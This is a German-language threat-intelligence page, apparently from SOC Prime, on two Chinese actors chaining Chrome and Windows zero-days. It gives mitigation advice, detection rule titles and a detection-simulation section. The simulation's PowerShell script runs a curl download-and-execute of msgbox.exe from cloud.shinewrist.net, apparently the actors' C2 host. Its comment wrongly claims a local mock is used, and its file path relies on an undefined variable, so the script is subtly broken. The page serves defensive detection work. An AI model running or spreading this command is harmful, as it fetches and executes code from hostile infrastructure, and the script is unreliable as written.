SOC Prime Bias: Critical

10 Sep 2026 15:37 UTC

Chinesische Bedrohungsakteure kombinieren Zero-Day-Lücken in Browsern und Windows

Author Photo
SOC Prime Team linkedin icon Folgen
Chinesische Bedrohungsakteure kombinieren Zero-Day-Lücken in Browsern und Windows
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Zwei chinesische Bedrohungsakteure, UTA0560 und JungleBamboo, nutzen eine ausgeklügelte mehrstufige Exploiting-Kette, die sich gegen Google Chrome und den Windows-Kernel richtet. Die Angriffe nutzen ein Patch-Gap-Fenster aus, in dem Schwachstellen in Chromium behoben werden, bevor entsprechende Updates die veröffentlichten Google Chrome-Versionen erreichen. Spear-Phishing-Locks liefern verschiedene Nutzlasten, darunter das GRIMWEDGE JScript-Backdoor und die LONGTALE Chrome-Erweiterung.

Untersuchung

Die Netzwerksicherheitsüberwachung von Volexity hat am 1. September 2026 eine Spear-Phishing-Kampagne gegen NGOs identifiziert. Die Untersuchung deckte eine gemeinsame Exploiting-Kette auf, die CVE-2026-85046, CVE-2026-87491 und CVE-2026-85880 beinhaltete. Analysten trennten die Aktivitäten in zwei Cluster: UTA0560 setzt GRIMWEDGE ein und JungleBamboo nutzt SUPERSTOMP, um die LONGTALE-Erweiterung zu installieren.

Abmilderung

Organisationen sollten Google Chrome auf die neueste verfügbare Version aktualisieren, um die Exposition während der Patch-Gap-Perioden zu reduzieren. Sicherheitsteams sollten das Verhalten von ungewöhnlichen Chrome-Kindprozessen und unerlaubte Installationen von Chrome-Erweiterungen überwachen. Eine strenge E-Mail-Filterung gegen Spear-Phishing-Locks und die Überwachung auf verdächtige oder unerlaubte Erstellung von geplanten Aufgaben werden ebenfalls empfohlen.

Reaktion

Wenn eine Ausnutzung festgestellt wird, sollten betroffene Hosts sofort isoliert werden, um weitere Kommunikation mit der Befehls- und Kontrollinfrastruktur oder laterale Bewegungen zu verhindern. Einsatzkräfte sollten Speicherforensik an Chrome-Prozessen durchführen, um injizierten Shellcode zu identifizieren. Installierte Chrome-Erweiterungen sollten ebenfalls überprüft und geplante Aufgaben auf verdächtige Einträge wie Windows Scheduled System.

Angriffsablauf

Wir aktualisieren diesen Teil noch.

Erkennungen

Verdächtige CURL-Nutzung (über Befehlszeile)

SOC Prime Team
10. Sep 2026

Verdächtige Befehls- und Kontrollkommunikation durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfragen (über dns)

SOC Prime Team
10. Sep 2026

Verdächtige geplante Aufgabe (über Audit)

SOC Prime Team
10. Sep 2026

IOCs (HashSha256) zur Erkennung: Beachten Sie das (Patch-)Gap: Mehrere chinesische Bedrohungsakteure verketten 0-Day-Exploits in Chrome & Windows

SOC Prime AI-Regeln
10. Sep 2026

IOCs (SourceIP) zur Erkennung: Beachten Sie das (Patch-)Gap: Mehrere chinesische Bedrohungsakteure verketten 0-Day-Exploits in Chrome & Windows

SOC Prime AI-Regeln
10. Sep 2026

IOCs (DestinationIP) zur Erkennung: Beachten Sie das (Patch-)Gap: Mehrere chinesische Bedrohungsakteure verketten 0-Day-Exploits in Chrome & Windows

SOC Prime AI-Regeln
10. Sep 2026

Chrome Zero-Day Exploit Chain Landing Pages [Webserver]

SOC Prime AI-Regeln
10. Sep 2026

Erkennung von GRIMWEDGE JScript-Backdoor und Nutzlastbereitstellung (Windows-Prozesserstellung)

SOC Prime AI-Regeln
10. Sep 2026

Simulationsausführung

  • Angriffsbericht & Befehle: Der Angreifer versucht, einen Fuß in das kompromittierte System zu bekommen, indem er das GRIMWEDGE JScript-Backdoor installiert. Um eine Erkennung durch einfache signaturbasierte AV zu vermeiden, nutzt der Angreifer cmd.exe und das native curl Hilfsprogramm, um einen Stufe-zwei-Lader namens msgbox.exe von einer entfernten Befehl-und-Kontroll-(C2)-Infrastruktur herunterzuladen. Sobald der Download abgeschlossen ist, führt der Angreifer die Nutzlast sofort aus dem %TEMP% Verzeichnis aus, um die Zeit zu minimieren, die die Datei auf der Festplatte verbleibt, und um ein Verzeichnis zu nutzen, das von der grundlegenden Überwachung oft übersehen wird. Diese Sequenz ist darauf ausgelegt, dem spezifischen Kommandozeilenmuster zu entsprechen, nach dem die Erkennungsregel sucht.

  • Regressionstest-Skript:

    # Simulationsskript zur Auslösung der GRIMWEDGE-Erkennungsregel.
    # Dieses Skript erstellt eine Dummy-Datei, um die heruntergeladene Nutzlast zu simulieren.
    
    $tempDir = $env:TEMP
    $payloadName = "msgbox.exe"
    $payloadPath = Join-Path $tempDir $payloadName
    
    # 1. Erstellen Sie eine Dummy-"msgbox.exe", um die heruntergeladene Nutzlast zu simulieren
    # In einem echten Angriff wäre dies die tatsächliche schädliche Binärdatei.
    New-Item -Path $payloadPath -ItemType File -Force
    Set-Content -Path $payloadPath -Value "Dummy Payload Content"
    
    # 2. Führen Sie den genauen Befehlsstring aus, der in der Erkennungslogik identifiziert wurde.
    # Hinweis: Wir verwenden einen lokalen Echo/Mock-Ansatz für die URL, um sicherzustellen, dass der Befehlsstring genau übereinstimmt.
    cmd.exe /c "curl -f -sS -o ""$tempDirmsgbox.exe"" ""https://cloud.shinewrist.net/test/msgbox.exe"" && ""$tempDirmsgbox.exe"""
    
    Write-Host "Simulation abgeschlossen. Überprüfen Sie SIEM auf Alarme, die dem GRIMWEDGE-Muster entsprechen."
  • Bereinigungskommandos:

    # Bereinigungsskript zum Entfernen der simulierten Nutzlast und Dateien.
    $tempDir = $env:TEMP
    $payloadPath = Join-Path $tempDir "msgbox.exe"
    
    if (Test-Path $payloadPath) {
        Remove-Item -Path $payloadPath -Force
        Write-Host "Bereinigung erfolgreich: $payloadPath entfernt."
    } else {
        Write-Host "Nutzlast nicht gefunden. Bereinigung nicht erforderlich."
    }